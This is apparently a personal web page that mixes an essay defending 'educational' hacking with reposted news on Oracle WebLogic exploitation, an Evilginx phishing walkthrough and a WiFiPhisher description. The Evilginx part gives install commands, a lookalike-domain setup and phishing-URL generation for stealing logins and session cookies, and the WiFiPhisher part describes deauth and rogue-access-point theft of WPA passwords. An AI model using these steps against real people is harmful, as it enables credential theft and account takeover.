top of page
HELLO,World

Be patriotic about our nation

About

About

What is hacking?

Hacking is identifying weakness in computer systems or networks to exploit its weaknesses to gain access. Example of Hacking: Using password cracking algorithm to gain access to a system

Computers have become mandatory to run a successful businesses. It is not enough to have isolated computers systems; they need to be networked to facilitate communication with external businesses. This exposes them to the outside world and hacking. Hacking means using computers to commit fraudulent acts such as fraud, privacy invasion, stealing corporate/personal data, etc. Cyber crimes cost many organizations millions of dollars every year. Businesses need to protect themselves against such attacks.

we are anonymous - we do not .......
00:00 / 00:00
Education & Experience

Education and Experience

Hacking is illegal. But when you hack a self-designed system for learning purposes, i's a different story. Doing this can provide a solid learning experience and help those in your educational community or business or the world at large. Often these kinds of self-produced hacking attacks are put on by computer investigators and draw big crowds on the forensic conference circuit. They demonstrate how systems are broken in real time, on the fly—and offer solutions for protecting against such attacks.

But what happens when the target of an education attack is unaware that they’re under fire? What happens when i's a popular website or million-dollar desktop program? The moral line gets a little blurry.

Recently Twitter was auto-hacked as a kind of educational experiment. An add-on called Idiocy hacked accounts that were posting on http://www.twitter.com rather than https://www.twitter.com—the latter being the secure site connection—to ostensibly “teach” the users that they should always roll securely. A little harsh? Maybe. Effective? Definitely.

While one should never break the law, many—dare I say most—security tools and practices were born as a response to a hacker attack. Hackers help security professionals stay sharp. If the hacker is going after a site or account without malicious intent, I tend to think of them as doing the developer—or the system—a favor. The next hacker might have different ends in mind. Not a lesson anyone wants to learn when, say, a bank account is being drained or other important information is on the line.

There should be rules, though, or at least one big one: If a site or program is broken, the vendor should know about it and be given ample time to fix it before the information is released to the public. Once they know about it, the ball is in the developer’s or designer’s court. But if they know about it and don’t act, sometimes a public release of the information or the mode of attack can apply needed pressure. That was the case with the Twitter virus in September. Twitter officials knew about the issue for months but didn’t move on fixing it until a colorful hack made headlines.

The bonus effect of hacking to educate is that it informs and furthers development. Metasploit and Nessus started as hacking and exploitation tools, became commercialized and are now two of the industry-leading security tools in vulnerability assessment and exploitation. Hacking in this case is—forgive the cliché—like planting a seed. Which is to say that hacking, when not used for malicious purposes or ill-gotten gain, produces information—information that can be helpful and ultimately protect you from future attacks that might not be so kind.

Skills & Languages

Latest Hacking News

Oracle WebLogic Servers Attacked Following Publication Of PoC Code

Hackers have attacked the Oracle WebLogic servers and attempted to take control of those vulnerable who have not received the latest patch after a critical vulnerability was highlighted.

The bug is registered as CVE-2018-2893 – a vulnerability in the Oracle WebLogic middleware that allows that hacker to take control over the entire server without even needing the password. The vulnerability has reached the critical level after these hacking attempts. The vulnerability has received 9.8/10 critical level score on the CVSv3 Security Scale.

The high score is due to the remote exploitation factor and the ease of exploitation of the vulnerability. The details of the vulnerability were never released to the public and the company had released patches for this bug on July 18th.

After three days there have been several Proof-of-Concept videos that explain the exploit and most of the videos have been taken down there are still PoC code which are available in GitHub at the time of this articles publication (A,B). The availability of the PoC code has led to a lot of vulnerabilities and exploitation attempts. The first exploitation attempt reportedly started on July 21st when the news of PoC existence had gone wide and from then the attacks have ramped up.

The Security Researchers from ISC SANS and Qihoo 360 Netlab are currently tracking two groups who seem to have automated the exploitation routine and are conducting the attacks on a huge scale.

The owners of the Oracle Servers are instructed to apply the patch as soon as possible. The Oracle WebLogic Servers that are running  10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 are currently vulnerable to the exploit and will be needing the patch.

The flaw is being exploited by using the port 7100 so all the owners who haven’t applied the patch are requested to block the port on their routers.

Evilginx – The Free Advanced Phishing Attack Framework

Evilginx is framework that is able to steal user credentials through a man in the middle attack. Evilginx uses the Ngnix HTTP proxy module (proxy_pass) to pass client requests to the desired server for the intercepted client-server traffic, in order to block the user from redirecting to the actual website, Evilginx uses another module called sub_filter.

​

Whoa there cowboy!, read the disclaimer from the author

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender’s responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

​

Additional Disclaimer from LHN

LHN only ever encourage its users to use such tools for research purposes, pen testing, red team assessments or any other purpose that falls within such legal jurisdictional laws, if you are unsure whether it meets the aforementioned standards, we recommend you consult a legal professional. If you decide to blatantly ignore any of the above recommendations we cannot be held responsible for any subsequent prison sodomy you may incur as a result.

​

Evilginx Installation

 

​

​

Awards & Interests
evilginx2.png

Evilginx can be installed by cloning the github repository and the following commands.

​

apt-get update

apt-get –y install git

git clone https://github.com/kgretzky/evilginx

cd evilginx

chmod 700 install.sh

./install.sh

Launching a Phishing Attack Using Evilginx

Evilginx supports some well-known websites templates for phishing attacks. These include google, dropbox, facebook, and linked.

python evilginx.py setup -l

​

evil3.png

Domain Requirement

​

Evilginx requires a domain to setup the web pages for the phishing purpose. The domain name must be similar to the selected website for deception. The domain can be registered with any domain registrar with the nameservers redirecting to the desired server. Besides domains, Evilginx also requires subdomains to be configured and redirected correctly just like domains. After the domain setup, it can be configured with the Evilginx framework using the following command.

​

python evilginx.py setup --enable <site template here> -d <domain name here>

​

Suppose we want the google site template for the phishing purpose using a setup domain registered as not-really-google.com.  We can write the syntax in the following manner. The argument “ -d”  in the command represents the ownership of the domain.

​

python evilginx.py setup --enable google -d not-really-google.com

​

The final step is to generate the phishing urls. For this purpose, we need to define a redirect url for the user.  In case of google, we can define any google service where the user can be redirected after successful login to the phishing url.  The syntax for generating the phishing url is given in the following command. The “-r” argument in the following command indicates the redirect url where the user is redirected after stealing credentials. The generated phishing url is the actual link that captures the user credentials.

​

python evilginx.py genurl -s google -r <redirect url here>

Generated following phishing URL: : https://accounts.not-really-google.com/ServiceLogin?

rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Ydfdffsdfsdfsdfsdf

​

For every successful login by the users, the Evilginx saves the login credentials and session cookies in the root directory. By default the framework logs all the users’ requests. However, a parser script called evilginx_parser.py automatically extracts the credentials into corresponding directories for easy management.

Evilginx can be used for penetration testing purpose in organizations to educate employees about  phishing attacks and encourage preventive measures.

​

​

​

​

WifiPhisher – Used for Hacking WPA/WPA2 Security

Opera Snapshot_2018-07-28_221806_latesth

George Chatzisofroniou has published a new Method for Hacking WPA/WPA2 Security using a WiFi social engineering tool designed to steal credentials from users of secure wireless networks.

The administrator at the University of Greece developed the WiFiPhisher tool which is used to discover and replicate WPA-protected networks, sans password.

The tool, can be downloaded from GitHub here and works by producing a number of deauthorisation packets at a legitimate access point jamming it and prompting users to inspect available networks.

Users will see the malicious network posing as their trusted access point.

wifi2.png
wifi3.png

How it works

Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials.

Wifiphisher works on Kali Linux and is licensed under the MIT license.

From the victim’s perspective, the attack makes use in three phases:

1.) Victim is being deauthenticated from their access point:-

Wifiphisher continuously jams all of the target access point’s wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.

2.) Victim joins a rogue access point:-

Wifiphisher sniffs the area and copies the target access point’s settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.

3.) Victim is being served a realistic router config-looking page:-

 wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.

Here is a diagram of the above:

wifi4.png
bottom of page